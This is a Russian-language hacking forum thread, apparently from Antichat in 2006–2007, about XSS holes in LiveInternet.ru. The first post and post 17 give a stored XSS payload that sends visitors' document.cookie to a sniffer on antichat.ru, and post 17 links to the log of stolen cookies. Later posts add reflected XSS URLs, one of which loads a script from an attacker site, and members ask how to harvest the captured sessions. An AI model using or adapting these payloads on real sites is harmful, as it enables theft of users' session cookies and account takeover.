XSS в дневнике LiveInternet.ru

Discussion in 'Уязвимости' started by InferNo23, 13 Dec 2006.

  1. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Вот нашол активную xss:
    когда регимся, вводим в поле "О новом дневнике - в двух словах"
    Code:
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    .
    потом все кто помотрит ваш профиль отдаст куки...
    Примеры:
    http://www.liveinternet.ru/users/hello2all/profile/ - тут отдадите куки
    http://www.liveinternet.ru/users/nokia1/profile/ - алерт.
     
    8 people like this.
  2. -FARAON2005RAMSES-

    -FARAON2005RAMSES- Elder - Старейшина

    Joined:
    6 Oct 2006
    Messages:
    37
    Likes Received:
    12
    Reputations:
    -7
    О! санкс! всё пашет!
     
  3. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    да..+ тебе )))
    хотя уже пол года назад знал.....там ваще админы тупят...
     
  4. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    http://www.liveinternet.ru/journal_register.php
    Поле:*Подтвердить пароль:
    не фильтруется!
     
    1 person likes this.
  5. †Romi4†

    †Romi4† Elder - Старейшина

    Joined:
    6 Feb 2006
    Messages:
    342
    Likes Received:
    205
    Reputations:
    26
    )) прикольно,лови +
     
  6. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    Туплю, не нашел этот пункт :(
    Именно где он? Я по новой не регился, я именно хотел бы узнать где он в настройках, + у других в пофиле такого тоже не увидел, Черт не дружу я с таких типов сайтами :(
     
    #6 Petr, 15 Dec 2006
    Last edited: 15 Dec 2006
  7. -FARAON2005RAMSES-

    -FARAON2005RAMSES- Elder - Старейшина

    Joined:
    6 Oct 2006
    Messages:
    37
    Likes Received:
    12
    Reputations:
    -7
    именно поэтому ты и не нашёл этот пунктик.
    Надо региться заного, тогда найдёшь.
     
  8. Zadoxlik

    Zadoxlik рояль с сыром

    Joined:
    28 Feb 2005
    Messages:
    758
    Likes Received:
    216
    Reputations:
    257
    Пишите Xss вирус =) Мой для ливжурнала помог пользователям получить красивые доменчики третего уровня для своих ЖЖ =)
     
  9. *D1VER

    *D1VER Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    108
    Likes Received:
    67
    Reputations:
    21
    http://market.liveinternet.ru/index.php?id=10091&page=1&vendor=0&sort=2&sortorder=1&pricelo=10%22%3E%3Cscript%3Ealert()%3C/script%3E0

    Пассивная ХSS почти там же!
     
  10. ReanimatoR

    ReanimatoR Elder - Старейшина

    Joined:
    27 Aug 2006
    Messages:
    120
    Likes Received:
    118
    Reputations:
    34
    PASSIVE XSS при реге счетчиков
    http://www.liveinternet.ru/add/add/?rules=agreed&www=&type=site&random=1113854391&url=http%3A%2F%2Flalala.2u2r%2F&aliases=&name="><script src=http://ТВОЙСАЙТ.ru/js.js></script>&email=123%40123.123&password=mikmik&check=mikmik&keywords=&private=&subscribe=on&group=ru&group=ru%2Fauto&ok=+%E4%E0%EB%FC%F8%E5+%3E%3E+
     
  11. Noman

    Noman Elder - Старейшина

    Joined:
    10 Oct 2006
    Messages:
    112
    Likes Received:
    23
    Reputations:
    2
    Не совсем понял за что "-", но больше вопросов подобного плана задавать не буду. Единственно хотелось бы узнать, что я нарушил.

    во-первых посмотри название темы, то что ты написал не относится сюда.Есть вопрос, ищи, если такая тема есть, прочти, если нету, создай в соответствующем разделе и спроси.Разе непонятно почему "-"?Тоже самое относится и другому товарищу.Еще вопросы?С вами был m0nzt3r :)
     
    #11 Noman, 28 Dec 2006
    Last edited by a moderator: 28 Dec 2006
  12. Petr

    Petr Banned

    Joined:
    10 Jun 2006
    Messages:
    642
    Likes Received:
    369
    Reputations:
    -13
    если не ошибаюсь пасивный xxs это тот каторый уже прикрыли, так зачем выкладывать его
    если не прав объясните что значит пасивный.

    пассивная, это когда жертва должна зайти по ссылке, которую ты дашь, чтоб хсс подействовала.Понятно?Мало флейми, устал посты стирать твои.. (m0nzt3r)
     
    #12 Petr, 13 Jan 2007
    Last edited by a moderator: 14 Jan 2007
  13. re-arranged

    re-arranged New Member

    Joined:
    17 Nov 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    ребят, а дырку, по ходу, уже прикрыли. мне почему-то кажется, что тут нетрудно будет другую найти, тут просто <script> фильтруется. *вышесказанное было написано без моска, ибо я в этом деле не очень разбираюсь =)*.
    может кто-нибудь башковитый и рукастый сможет сообразить в чем тут дело? помогите, пожалуйста.
     
  14. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Это другой серв....
     
    _________________________
  15. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    2 re-arranged

    http://www.liveinternet.ru/member2.php?action=addlist&userlist=buddy&userid=729772&userownid=undefined"><script>alert("xss")</script>

    пассивная
     
  16. DeadFire

    DeadFire New Member

    Joined:
    5 May 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0

    А что дальше делать?

    Куки отправляются на снифф общий? если да, то я не могу найти его лог =/

    Зы: или это уже вообще не катит?


    +1 =)
     
    #16 DeadFire, 28 Feb 2007
    Last edited: 28 Feb 2007
  17. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Не прикрыли ничего, http://www.liveinternet.ru/users/nokia1/profile/ алерт есть..
    2DeadFire лог теперь на old.antichat.ru
    Code:
    <script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    Log: http://old.antichat.ru/sniff/log.php
     
  18. DeadFire

    DeadFire New Member

    Joined:
    5 May 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Объясните плз для тупых что нужно сделать по шагам.

    Зы: там скрипты отсеиваются

    Зыы: я создал юзера (Vasssssia) в поле краткая инфа запихал скрипт, ну собсно и в основную тоже, на сниф вообще ниче не приходит..
    приходит, когда просто в дневник пихаешь "картинку", только толку от этого как от быка молока...

    Зыыы: за лог спасибо
     
    #18 DeadFire, 3 Mar 2007
    Last edited: 3 Mar 2007
  19. re-arranged

    re-arranged New Member

    Joined:
    17 Nov 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    2InferNo23 тысяча чертей, отсеиваются <script> </script>.
     
  20. LeopardSS

    LeopardSS Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    64
    Likes Received:
    8
    Reputations:
    5
    я не любитель создавать темы изза небольших вопросов, поэтому спрошу тут. В куках лиру хранится чистый мд5 или соль?